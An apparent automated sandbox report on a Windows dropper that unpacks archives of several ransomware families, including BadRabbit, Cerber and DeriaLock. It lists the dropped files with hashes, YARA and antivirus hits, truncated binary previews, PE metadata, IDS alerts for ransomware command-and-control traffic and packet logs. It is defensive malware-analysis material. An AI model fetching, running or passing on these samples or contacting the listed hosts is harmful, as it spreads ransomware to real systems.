Preview:	PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r\|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..\|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.\|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..

C:\Users\user\Desktop\DeriaLock.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	215551
Entropy (8bit):	7.999084540418597
Encrypted:	true
SSDEEP:	6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
MD5:	016D1CA76D387EC75A64C6EB3DAC9DD9
SHA1:	B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
SHA-256:	8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
SHA-512:	F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
Malicious:	false
Preview:	PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........\|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..!...C}..H..v5....\|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!./L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ\|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....\|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......

C:\Users\user\Desktop\Fantom.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	203087
Entropy (8bit):	7.998965133479219
Encrypted:	true
SSDEEP:	6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
MD5:	3500896B86E96031CF27527CB2BBCE40
SHA1:	77AD023A9EA211FA01413ECD3033773698168A9C
SHA-256:	7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
SHA-512:	3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
Malicious:	false
Preview:	PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3...:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.\|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..\|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB...S:...C.;.e.H......\|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8

C:\Users\user\Desktop\InfinityCrypt.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	34300
Entropy (8bit):	7.994524271759185
Encrypted:	true
SSDEEP:	768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
MD5:	5569BFE4F06724DD750C2A4690B79BA0
SHA1:	05414C7D5DACF43370AB451D28D4AC27BDCABF22
SHA-256:	CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
SHA-512:	775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
Malicious:	false
Preview:	PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.\|V.NtQ.#2.YoP..S;.}\|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... \|E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^..;...s..Nu.)...7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....\|:\|..k..l.......<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf\|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t\|z.........rmq}G..P...o.

C:\Users\user\Desktop\Krotten.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
Category:	dropped
Size (bytes):	26359
Entropy (8bit):	7.99208020012939
Encrypted:	true
SSDEEP:	768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
MD5:	1AEA5AD85DF3B14E216CC0200C708673
SHA1:	E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
SHA-256:	8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
SHA-512:	06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
Malicious:	false
Preview:	PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f........c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..\|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4\|.#>"..G.0fN...L..b....pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h\|9V.^aZ.#.....B..P.\|...gk...n...\-.....3..:P....Y.....^.....j..Ty..\|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..

C:\Users\user\Desktop\NoMoreRansom.zip

Download File

Process:	C:\Users\user\Desktop\irH9zMhZub.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	938498
Entropy (8bit):	7.999770835729866
Encrypted:	true
SSDEEP:	24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
MD5:	F315E49D46914E3989A160BBCFC5DE85
SHA1:	99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
SHA-256:	5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
SHA-512:	224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
Malicious:	false
Preview:	PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.\|........Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}\|....Jq.........Sv%.M.Q.!?....L....^24<..eP]...crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[

C:\Windows\5753.tmp

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	62328
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	C7CA77D847F1802502EF3B9228D388E4
SHA1:	80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
SHA-256:	FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
SHA-512:	B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
Malicious:	true
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\cscc.dat

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	210632
Entropy (8bit):	6.677691827536191
Encrypted:	false
SSDEEP:	3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
MD5:	EDB72F4A46C39452D1A5414F7D26454A
SHA1:	08F94684E83A27F2414F439975B7F8A6D61FC056
SHA-256:	0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
SHA-512:	D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
Malicious:	true
Yara Hits:	Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...\|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................

C:\Windows\dispci.exe

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	142848
Entropy (8bit):	6.314365095327337
Encrypted:	false
SSDEEP:	3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
MD5:	B14D8FAF7F0CBCFAD051CEFE5F39645F
SHA1:	AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
SHA-256:	8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
SHA-512:	F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
Malicious:	true
Yara Hits:	Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Metadefender, Detection: 86%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\infpub.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
File Type:	data
Category:	dropped
Size (bytes):	410760
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	C4F26ED277B51EF45FA180BE597D96E8
SHA1:	E9EFC622924FB965D4A14BDB6223834D9A9007E7
SHA-256:	14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
SHA-512:	AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
Malicious:	true
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.934512446694329
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	irH9zMhZub.exe
File size:	152576
MD5:	7d8f0e539e50eb545d094c50aab0ea9e
SHA1:	9368da690ace5328abc4461cd8322d78c1fdc290
SHA256:	f9c5420c0f039a178f5495ecfb657f8da383624e0cf7f02c645fbdfa95e2e8b9
SHA512:	092d05eb357da75c2a6646a353e1c1cf7f0ae66ea32ac4beff8fda87160c9226417b187b4ac34e7b5745aaa65c8a6b8b33b9f02e19d9a959627544b50a3eae7a
SSDEEP:	3072:Pmpq7ybSPGccu5R9Wl7rSmpVYc7+DUltw/ArIW1:epqG2eM5R9kNj2UlgJ
TLSH:	99E3024C9A0CCE13E42A5AFD489E87453D29C470DDCAFA4D3778B992488F7D39A43627
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........."......J...........h... ........@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4268ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x601F16E4 [Sat Feb 6 22:23:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26858	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28000	0x566	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x248b4	0x24a00	False	0.9711964057167235	data	7.963291049609408	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28000	0x566	0x600	False	0.408203125	data	3.9657132211361437	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x280a0	0x2dc	data
RT_MANIFEST	0x2837c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6162.55.0.13749767802824087 09/29/22-14:52:28.844656	TCP	2824087	ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity	49767	80	192.168.2.6	162.55.0.137
192.168.2.693.107.12.05908368932023613 09/29/22-14:50:24.513544	UDP	2023613	ET TROJAN Ransomware/Cerber Checkin M3 (2)	59083	6893	192.168.2.6	93.107.12.0

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2022 14:49:48.408546925 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.408637047 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.408760071 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.456175089 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.456232071 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.513746977 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.513962984 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.534019947 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.534058094 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.534596920 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.578466892 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.951728106 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.951777935 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.970257998 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.970509052 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.970669985 CEST	443	49718	140.82.121.4	192.168.2.6
Sep 29, 2022 14:49:48.970701933 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.970735073 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:48.974912882 CEST	49718	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:49:49.001861095 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.001946926 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.002510071 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.002510071 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.002612114 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.054955006 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.056195021 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.057913065 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.057939053 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.058434963 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.062932014 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.062990904 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.241731882 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.243940115 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.244002104 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.244091034 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.244123936 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.244167089 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.244194031 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.247102022 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.247159004 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.247265100 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.247308016 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.247358084 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.258915901 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.258960009 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.259092093 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.259126902 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.259154081 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.261347055 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.261369944 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.261466026 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.261492968 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.261507034 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.262936115 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.262969017 CEST	443	49719	185.199.108.133	192.168.2.6
Sep 29, 2022 14:49:49.263056040 CEST	49719	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:49:49.263077021 CEST	443	49719	185.199.108.133	192.168.2.6
